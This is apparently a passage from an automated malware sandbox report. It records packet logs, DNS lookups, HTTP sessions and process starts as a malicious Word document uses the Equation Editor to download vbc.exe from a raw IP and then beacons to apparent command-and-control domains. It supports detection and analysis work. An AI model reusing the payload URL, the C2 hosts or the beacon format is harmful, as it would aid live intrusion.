                                                                                                                                                      Apr 8, 2021 13:09:09.032223940 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.032226086 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.032283068 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.032308102 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.032339096 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.032342911 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.032398939 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.032418966 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.032455921 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.032463074 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.032511950 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.032537937 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.032569885 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.032572031 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.032627106 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.032645941 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.032677889 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.032690048 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.032751083 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.032769918 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.032808065 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.032830954 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.032865047 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.032869101 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.032922983 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.032938957 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.032977104 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.033004999 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.033035040 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.033044100 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.033091068 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.033102989 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.033155918 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.033163071 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.033212900 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.033265114 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.033267021 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.033278942 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.033337116 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.033865929 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.148685932 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.148722887 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.148750067 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.148772955 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.148799896 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.148828030 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.148852110 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.148879051 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.148958921 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.149013996 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.149020910 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.149025917 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.150214911 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.150247097 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.150274038 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.150300026 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.150330067 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.150347948 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.150358915 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.150360107 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.150372028 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.150419950 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.150422096 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.150454044 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.150482893 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.150492907 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.150511980 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.150512934 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.150528908 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.150542974 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.150573015 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.150573015 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.150592089 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.150639057 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.150681019 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.150711060 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.150744915 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.150760889 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.150762081 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.150793076 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.150816917 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.150830030 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.150990009 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.151310921 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.385312080 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.385337114 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.385370016 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.385397911 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.385458946 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.385504961 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.385509968 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.385541916 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.385560989 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.385590076 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.385611057 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.385632038 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.385662079 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.385719061 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.385772943 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.385792017 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.385808945 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.385812998 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.385819912 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.385844946 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.385869026 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.385886908 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.385919094 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.385919094 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.385967970 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.385993958 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386015892 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386032104 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386065006 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386091948 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386117935 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386131048 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386166096 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386182070 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386212111 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386214018 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386257887 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386277914 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386307001 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386307955 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386356115 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386398077 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386399984 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386436939 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386445045 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386467934 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386487961 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386502981 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386526108 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386558056 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386564970 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386590958 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386615992 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386624098 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386625051 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386656046 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386674881 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386691093 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386722088 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386723042 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386755943 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386761904 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386797905 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386799097 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386828899 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386831999 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386863947 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386866093 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386898994 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386910915 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386930943 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.386959076 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.386996031 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.388751030 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.388775110 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.388791084 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.388828993 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.388880014 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.388901949 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.388922930 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.388946056 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.388999939 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.389616966 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.389641047 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.389661074 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.389682055 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.389703035 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.389714003 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.389740944 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.389758110 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.389863014 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.389887094 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.389906883 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.389930010 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.389935017 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.389954090 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.389985085 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.389991045 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390010118 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390049934 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390069962 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390070915 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390091896 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390114069 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390127897 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390136003 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390160084 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390162945 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390187979 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390197039 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390208960 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390227079 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390232086 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390264988 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390269041 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390290976 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390292883 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390322924 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390333891 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390347958 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390387058 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390393019 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390424013 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390444994 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390474081 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:09.390507936 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390531063 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:09.390552044 CEST804916723.95.122.24192.168.2.22

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Apr 8, 2021 13:10:40.826649904 CEST | 192.168.2.22 | 8.8.8.8 | d017 | (Port unreachable) | Destination Unreachable
Apr 8, 2021 13:10:49.795681000 CEST | 192.168.2.22 | 8.8.8.8 | d004 | (Port unreachable) | Destination Unreachable
Apr 8, 2021 13:10:50.936537027 CEST | 192.168.2.22 | 8.8.8.8 | d004 | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 8, 2021 13:10:38.511143923 CEST | 192.168.2.22 | 8.8.8.8 | 0x708c | Standard query (0) | www.likehowto.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:10:39.512011051 CEST | 192.168.2.22 | 8.8.8.8 | 0x708c | Standard query (0) | www.likehowto.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:10:46.038341045 CEST | 192.168.2.22 | 8.8.8.8 | 0xa14d | Standard query (0) | www.pjsgsc.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:10:47.048526049 CEST | 192.168.2.22 | 8.8.8.8 | 0xa14d | Standard query (0) | www.pjsgsc.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:10:48.062608004 CEST | 192.168.2.22 | 8.8.8.8 | 0xa14d | Standard query (0) | www.pjsgsc.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:10:56.025228024 CEST | 192.168.2.22 | 8.8.8.8 | 0xccff | Standard query (0) | www.7985699.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:11:01.810698986 CEST | 192.168.2.22 | 8.8.8.8 | 0x2f03 | Standard query (0) | www.xpddwrfj.icu | A (IP address) | IN (0x0001)
Apr 8, 2021 13:11:27.304687023 CEST | 192.168.2.22 | 8.8.8.8 | 0x3c4e | Standard query (0) | www.hcr.services | A (IP address) | IN (0x0001)

                                                                                                                                                      DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 8, 2021 13:10:39.841600895 CEST | 8.8.8.8 | 192.168.2.22 | 0x708c | No error (0) | www.likehowto.com | | 203.76.236.103 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:10:40.826580048 CEST | 8.8.8.8 | 192.168.2.22 | 0x708c | No error (0) | www.likehowto.com | | 203.76.236.103 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:10:48.698407888 CEST | 8.8.8.8 | 192.168.2.22 | 0xa14d | Server failure (2) | www.pjsgsc.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:10:49.795526028 CEST | 8.8.8.8 | 192.168.2.22 | 0xa14d | Server failure (2) | www.pjsgsc.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:10:50.936458111 CEST | 8.8.8.8 | 192.168.2.22 | 0xa14d | Server failure (2) | www.pjsgsc.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:10:56.456235886 CEST | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.7985699.com | k9cdna.51w4.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:10:56.456235886 CEST | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | k9cdna.51w4.com | | 45.142.156.44 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:11:02.164793968 CEST | 8.8.8.8 | 192.168.2.22 | 0x2f03 | Name error (3) | www.xpddwrfj.icu | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:11:27.326047897 CEST | 8.8.8.8 | 192.168.2.22 | 0x3c4e | Name error (3) | www.hcr.services | none | none | A (IP address) | IN (0x0001)

                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                      • 23.95.122.24
                                                                                                                                                      • www.likehowto.com
                                                                                                                                                      • www.7985699.com

                                                                                                                                                      HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 23.95.122.24 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:09:08.556489944 CEST | 0 | OUT | GET /zyo/vbc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 23.95.122.24
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 23.95.122.24 | 80 | 192.168.2.22 | 49167 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:09:08.675015926 CEST | 1 | IN | HTTP/1.1 200 OK
Date: Thu, 08 Apr 2021 11:09:09 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
Last-Modified: Thu, 08 Apr 2021 04:59:44 GMT
ETag: "5e800-5bf6eea6ef000"
Accept-Ranges: bytes
Content-Length: 387072
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49168 | 203.76.236.103 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:10:40.007575989 CEST | 410 | OUT | GET /nnmd/?RzuD=vRs6n4JW3em4syOJV7b+YJv/yKqWGc/3Y/UBZKRypASveBlD9HGJWlgQmcmxQu52M4L1eA==&-Zz=NpM4AjBPzV5hSni0 HTTP/1.1
Host: www.likehowto.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 8, 2021 13:10:40.525779009 CEST | 410 | OUT | GET /nnmd/?RzuD=vRs6n4JW3em4syOJV7b+YJv/yKqWGc/3Y/UBZKRypASveBlD9HGJWlgQmcmxQu52M4L1eA==&-Zz=NpM4AjBPzV5hSni0 HTTP/1.1
Host: www.likehowto.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49169 | 45.142.156.44 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:10:56.630959034 CEST | 412 | OUT | GET /nnmd/?RzuD=5eMcWOIW8Rc4h8QDZH6T6n9ePY1bhRzkU2oAA9D0h2F0eFvVxskwV1Msq4lSZpkiXepntw==&-Zz=NpM4AjBPzV5hSni0 HTTP/1.1
Host: www.7985699.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 8, 2021 13:10:56.803525925 CEST | 412 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 08 Apr 2021 10:59:29 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Start time:13:08:35
                                                                                                                                                      Start date:08/04/2021
                                                                                                                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                                                                                      Imagebase:0x13fb90000
                                                                                                                                                      File size:1424032 bytes
                                                                                                                                                      MD5 hash:95C38D04597050285A18F66039EDB456
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:13:08:36
                                                                                                                                                      Start date:08/04/2021
                                                                                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:543304 bytes
                                                                                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
